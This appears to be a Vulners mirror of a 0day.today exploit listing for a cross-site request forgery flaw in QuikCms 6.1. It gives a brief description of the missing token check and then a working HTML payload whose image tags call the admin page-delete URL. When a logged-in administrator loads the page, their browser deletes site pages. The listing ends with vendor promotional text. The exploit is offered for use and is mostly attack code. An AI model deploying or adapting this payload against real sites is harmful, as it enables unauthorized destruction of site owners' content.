Lucene search
K

QuikCms 6.1 - CSRF Delete Web Pages Exploit

🗓️ 27 Nov 2015 00:00:00Reported by ZwXType 
zdt
 zdt
🔗 0day.today👁 16 Views

QuikCms 6.1 CSRF Delete Web Pages Exploi

Code
# Title : QuikCms 6.1 - CSRF Exploit (Delete Web Pages)
# Author : ZwX
# Vendor : http://opensolution.org/
# Download Link : http://opensolution.org/download/home.html?sFile=Quick.Cms_v6.1-en.zip
# Version : 6.1
# Security Level : Medium
# Tested Os : Windows 7

**** Description Vulnerability ****
-----------------------------------

A type of Cross Site Request Forgery vulnerability is located in the cms "QuikCms".
In the absence of a token attacker can execute html code to the administrator to delete pages the site.

**** Exploit Code ****
----------------------

<html>
<!-- Cross Site Request Forgery -->
<meta http-equiv="refresh" content="0">
<img src="http://localhost/admin.php?p=pages&iItemDelete=30"/>
<img src="http://localhost/admin.php?p=pages&iItemDelete=31"/>
</meta>
</html>

#  0day.today [2018-03-09]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation